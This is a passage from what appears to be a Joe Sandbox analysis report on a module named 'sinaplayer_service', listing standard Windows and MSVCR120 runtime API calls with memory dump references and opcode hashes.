                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0E001D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0E002B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    • Opcode ID: 11c479ff120d8dfbf7ebacdc4b4c2743f2ec1ef3bd6698d0bf42d4c2c83870d1
                                                                                                                                                                                                    • Instruction ID: 479a44717818496dfb3dc57fa0c6ee6fb1c76584bf2c318f352fb0fd042ab4f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c479ff120d8dfbf7ebacdc4b4c2743f2ec1ef3bd6698d0bf42d4c2c83870d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7161C031A18207DBFF258E7988907BB36E4BF49358F91922EFD189B250E731C851DB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000002,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D12894A
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D1289B7
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000000,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D1289F1
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,00000000,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D128A11
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D128A30
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D1288BC,?,?,?,?,?,?,?,?,?), ref: 6D128A8F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6D1288BC,?,?,?,?,?,?,?,?,?), ref: 6D128A9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    • Opcode ID: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction ID: 0c0718c0114464797883862b31fbb7bdba21a60b613ae017aa77bb87d5e4adeb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7461C731B14207DBEF148E2888906BB36A4FFA5355B11462DED2497288DBF3C8D1C7A6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ctrlfp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1574075368-0
                                                                                                                                                                                                    • Opcode ID: 8641d13f6a8bf279876f1f612e40444a814d9b9f32471e35a96cd527890ded1f
                                                                                                                                                                                                    • Instruction ID: 1d04207f1a17a2435dee9827213cb573e1955fb4a6e7b2e3fa0b5e0c42652752
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8641d13f6a8bf279876f1f612e40444a814d9b9f32471e35a96cd527890ded1f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B05167B0C08A0AEADB116F34D84136EBBB4FF92344F51C75AF4D815094EF7894A6D382
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1C65
                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCMT ref: 6D0D1C77
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1CA1
                                                                                                                                                                                                    • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1CE9
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1D09
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0D1D3D
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0D1D4C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$AcquireListLock@details@ReaderSpinWrite@_Writer$A@@details@AliasBase::ClearConcurrency::details::ContextOnce@?$_SleepTableWait@$0
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2118211163-0
                                                                                                                                                                                                    • Opcode ID: 907707b226e98cef61f2b680147494535599f4d0bddcc3a2d107df40518e465c
                                                                                                                                                                                                    • Instruction ID: 087953ef5388e16cdce4fe9616879adbd7a38b6912b160a64828f37bc2f2b8c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907707b226e98cef61f2b680147494535599f4d0bddcc3a2d107df40518e465c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451CC31D09756DFEB05CFA8D4907EDBBB0BF09318F55416EDA416B281CB32A904CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6D0A0F30,00000000,00000000,00000000), ref: 6D0A0D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6D0A0EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6D0A0ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6D0A0EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6D0A0EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    • Opcode ID: 938ecd7b4937ae83e8520470836c6d3cd616a0a34b0a21956ab050b35b1e2c7c
                                                                                                                                                                                                    • Instruction ID: 713856a7c0c295425809a487c17306bc83fe68a47ce28938c1574e5f4b0b16a6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938ecd7b4937ae83e8520470836c6d3cd616a0a34b0a21956ab050b35b1e2c7c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D241ADB290021AABFF108EA4DC44FFE3BA9EF48365F150119F908A6251D771DC509790
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0ACE6B
                                                                                                                                                                                                      • Part of subcall function 6D09F81C: _getptd.MSVCR120(6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F82D
                                                                                                                                                                                                      • Part of subcall function 6D09F81C: _lock.MSVCR120(0000000D,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F845
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000220,6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0ACE97
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6D0A8CAC
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: GetCPInfo.KERNEL32(00000000,?), ref: 6D0A8CBB
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: memset.MSVCR120(00000019,00000000,00000101), ref: 6D0A8CD3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D), ref: 6D0ACF16
                                                                                                                                                                                                    • free.MSVCR120(?,6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0D759E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd_lock$CodeInfoPageValid_malloc_crtfreemallocmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1238899101-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EB929
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB950
                                                                                                                                                                                                      • Part of subcall function 6D0EF6A1: __EH_prolog3.LIBCMT ref: 6D0EF6A8
                                                                                                                                                                                                    • malloc.MSVCR120(00000000,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9AA
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9D7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?), ref: 6D0EB9EC
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EBA39
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EBA50
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@ExceptionH_prolog3H_prolog3_ThrowV12@@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2302070164-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106F91
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D106F9B
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D106FBE
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D106FE4
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6D107018
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D10707E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D1070B0
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FeatureFileInformationPresentProcessProcessorSystemTerminateZone__aullrem__crt_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1117467957-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D101708,00000018), ref: 6D1015E2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D101708,00000018), ref: 6D1015ED
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D101708,00000018), ref: 6D10161D
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D101708,00000018), ref: 6D10162E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D101708,00000018), ref: 6D101688
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D101708,00000018), ref: 6D101693
                                                                                                                                                                                                    • _filbuf.MSVCR120(?,?,?,6D101708,00000018), ref: 6D1016B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_filbuf_fileno_invalid_parameter_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1327458189-0
                                                                                                                                                                                                    • Opcode ID: af89b61d606b3d96fa00f4f12902d34e4f849a392aa51b4d98e7292b3280ef8a
                                                                                                                                                                                                    • Instruction ID: 30a26b16fd61efa8ae83b87dd15f694c98c231e5ca9c140aa5a6aea047e3eabb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af89b61d606b3d96fa00f4f12902d34e4f849a392aa51b4d98e7292b3280ef8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31D5B1A042068BDB01AF798C4036976E1AF5536CF1A8359E535CF1D8DFFC85C18B11
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EC8BF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0EC90D
                                                                                                                                                                                                      • Part of subcall function 6D0EF8AE: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EF8BD
                                                                                                                                                                                                      • Part of subcall function 6D0EF904: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(6D15CEE8,?,6D0EC958,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6D0A793F), ref: 6D0EF90A
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCMT ref: 6D0EC95F
                                                                                                                                                                                                      • Part of subcall function 6D0F5CEF: SetEvent.KERNEL32(00000000,?,6D0EC964,?,00000000,00000000), ref: 6D0F5D3D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(Function_000DCF08,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6D0A793F,00000000), ref: 6D0EC96E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(Function_000DCF08,?,?,?,?,?,?,?,?,?,?,?,6D0A793F,00000000), ref: 6D0EC99C
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(6D15CF6C,?,00000024,6D0D3640,00000000,6D15CEE8), ref: 6D0EC9BA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(6D15CF6C,?,?,00000024,6D0D3640,00000000,6D15CEE8), ref: 6D0EC9C5
                                                                                                                                                                                                      • Part of subcall function 6D0F5773: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F57C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency::details::Concurrency@@CriticalManager@1@Proxy::ResourceSchedulerSectionValue$BorrowedCoreCurrentEnterEventH_prolog3_IncrementLeaveStateSubscriptionThreadToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1834826012-0
                                                                                                                                                                                                    • Opcode ID: 0cbb9ea73e23633b16c3eec286ffcd62fa1cc183e111d41fb3c7c3f8d1ccc6d3
                                                                                                                                                                                                    • Instruction ID: 50821528d0458bd75460e8e535049a536ff12b56f8838374ad2a1cf005a14473
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cbb9ea73e23633b16c3eec286ffcd62fa1cc183e111d41fb3c7c3f8d1ccc6d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831C470A04206DFDF08DFA4D4C8ABEBBB5FF48304B058199ED059B256D774E841CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,00000000), ref: 6D0E8FBC
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6D0E8FFA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,00000000), ref: 6D0E900F
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0E901C
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E9025
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E907E
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E90A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
